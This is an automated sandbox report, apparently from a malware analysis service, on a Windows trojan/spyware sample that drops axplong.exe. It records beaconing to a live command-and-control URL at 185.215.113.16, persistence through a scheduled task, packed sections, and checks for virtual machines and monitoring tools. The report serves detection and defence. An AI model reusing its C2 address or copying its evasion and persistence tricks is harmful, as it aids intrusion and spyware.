                    Source: unknownDNS traffic detected: query: 86.23.85.13.in-addr.arpa replaycode: Name error (3)
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0026BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,8_2_0026BD60
                    Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                    Source: global trafficDNS traffic detected: DNS query: 86.23.85.13.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php-k
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php2l
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php5
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpXkt
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpYlu
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpiQ
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpike
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedb
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnlf
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpoM
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php~k

                    System Summary

                    barindex
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_002A30688_2_002A3068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00264CF08_2_00264CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00297D838_2_00297D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_002A765B8_2_002A765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00264AF08_2_00264AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_002A87208_2_002A8720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_002A6F098_2_002A6F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_002A777B8_2_002A777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_002A2BD08_2_002A2BD0
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9975412976839237
                    Source: file.exeStatic PE information: Section: cyjncunv ZLIB complexity 0.9946675492791998
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9975412976839237
                    Source: axplong.exe.0.drStatic PE information: Section: cyjncunv ZLIB complexity 0.9946675492791998
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@2/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 52%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1943552 > 1048576
                    Source: file.exeStatic PE information: Raw size of cyjncunv is bigger than: 0x100000 < 0x1a8e00

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.a40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 8.2.axplong.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1e7fe1 should be: 0x1e96cc
                    Source: file.exeStatic PE information: real checksum: 0x1e7fe1 should be: 0x1e96cc
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: cyjncunv
                    Source: file.exeStatic PE information: section name: zwriwafc
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: cyjncunv
                    Source: axplong.exe.0.drStatic PE information: section name: zwriwafc
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0027D84C push ecx; ret 8_2_0027D85F
                    Source: file.exeStatic PE information: section name: entropy: 7.986737660676203
                    Source: file.exeStatic PE information: section name: cyjncunv entropy: 7.953951929244691
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.986737660676203
                    Source: axplong.exe.0.drStatic PE information: section name: cyjncunv entropy: 7.953951929244691
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE975 second address: AAE97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C191DF second address: C191E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C281D0 second address: C281DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA22C516E36h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C281DA second address: C281DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2844D second address: C28452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2BC09 second address: C2BC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2BCD0 second address: C2BD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jp 00007FA22C516E40h 0x00000010 jmp 00007FA22C516E3Ah 0x00000015 pop eax 0x00000016 mov dh, 11h 0x00000018 push 00000003h 0x0000001a mov cx, 5220h 0x0000001e push 00000000h 0x00000020 jmp 00007FA22C516E3Bh 0x00000025 call 00007FA22C516E44h 0x0000002a pushad 0x0000002b movzx edx, cx 0x0000002e sbb bx, D164h 0x00000033 popad 0x00000034 pop edi 0x00000035 push 00000003h 0x00000037 xor esi, 02EE8612h 0x0000003d push BD5DEB92h 0x00000042 push ebx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2BDB0 second address: C2BDB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2BDB5 second address: C2BDBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2BDBB second address: C2BE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, edx 0x0000000c push 00000000h 0x0000000e movzx esi, bx 0x00000011 push F66337FCh 0x00000016 jmp 00007FA22C835FABh 0x0000001b add dword ptr [esp], 099CC884h 0x00000022 push 00000003h 0x00000024 push esi 0x00000025 mov dword ptr [ebp+122D268Ah], edi 0x0000002b pop esi 0x0000002c push 00000000h 0x0000002e add si, 4E84h 0x00000033 push 00000003h 0x00000035 mov dword ptr [ebp+122D313Eh], ecx 0x0000003b push 9E807307h 0x00000040 jne 00007FA22C835FC1h 0x00000046 add dword ptr [esp], 217F8CF9h 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007FA22C835FA8h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 mov ecx, dword ptr [ebp+122D1B7Bh] 0x0000006d mov dword ptr [ebp+122D1B4Bh], ebx 0x00000073 lea ebx, dword ptr [ebp+12450ADAh] 0x00000079 sub dword ptr [ebp+122D1B92h], ecx 0x0000007f xchg eax, ebx 0x00000080 jmp 00007FA22C835FB4h 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 push esi 0x00000089 push edx 0x0000008a pop edx 0x0000008b pop esi 0x0000008c rdtsc
